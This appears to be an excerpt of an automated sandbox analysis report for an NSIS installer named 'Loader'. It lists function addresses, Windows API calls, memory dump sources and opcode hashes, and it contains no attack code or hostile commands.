                                                                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                                • String ID: nsa
                                                                                                                                                                                                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                                • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                                                Function 004067AA Relevance: 3.1, APIs: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405D85: CharNextW.USER32(-00000002,?,00461E18,004E30C8,004067C1,00461E18,00461E18,00406CDA,?,-00000002,00406CDA,?,004CF0A0), ref: 00405D93
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405D85: CharNextW.USER32(00000000), ref: 00405D98
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405D85: CharNextW.USER32(00000000), ref: 00405DB0
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00461E18,004E30C8,00000000,00461E18,00461E18,00406CDA,?,-00000002,00406CDA,?,004CF0A0), ref: 0040680A
                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00461E18,00461E18), ref: 00406817
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3248276644-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 09bd9f4f4bc4ae5b1ae8a956b705f631aaf87a84e9a2d6cedc9e286269f99e42
                                                                                                                                                                                                                                                                                                                • Instruction ID: c271629f7750957e5fd102afcb20a97c51063d27386b99ed5bca430d7485d950
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09bd9f4f4bc4ae5b1ae8a956b705f631aaf87a84e9a2d6cedc9e286269f99e42
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9201F72210592215D61277360C49D6F19848E46778317453FF813B32D2DF3CC972D0BE
                                                                                                                                                                                                                                                                                                                Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                                • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                                                Function 00403CAF Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,004CF0A0,00000000,-00000002,004038A2,00403AFD,?), ref: 00403CC9
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403CD0
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1100898210-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7aa37d378bfefabf0302afd0e1a532a972c8a2f9516866eadea19155c7ce1dfe
                                                                                                                                                                                                                                                                                                                • Instruction ID: d508d635739c5d3a1219feb871e2955d0a85dc440870d7c5be7dc09a9f5a7bc1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7aa37d378bfefabf0302afd0e1a532a972c8a2f9516866eadea19155c7ce1dfe
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95E0C233A1412097EB215F45E90C75ABB78AF89B72F024036E880BB26187342C8186C8
                                                                                                                                                                                                                                                                                                                Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                                                Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                                • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                                                Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                                • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                                                Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                                • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                                                Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                                • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                                                Function 00403885 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00403AFD,?), ref: 00403890
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                                                                                                                                                                                                                • Instruction ID: 859c8e5cf93c3f84440f38a6d8c6a0cb0ce917112422b96fb642ee91708591da
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BC01231504700D7E5206FB99D4EB043A54A74037DB544B7AF4F5F11F1C77C4645852D

                                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                                Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052D7
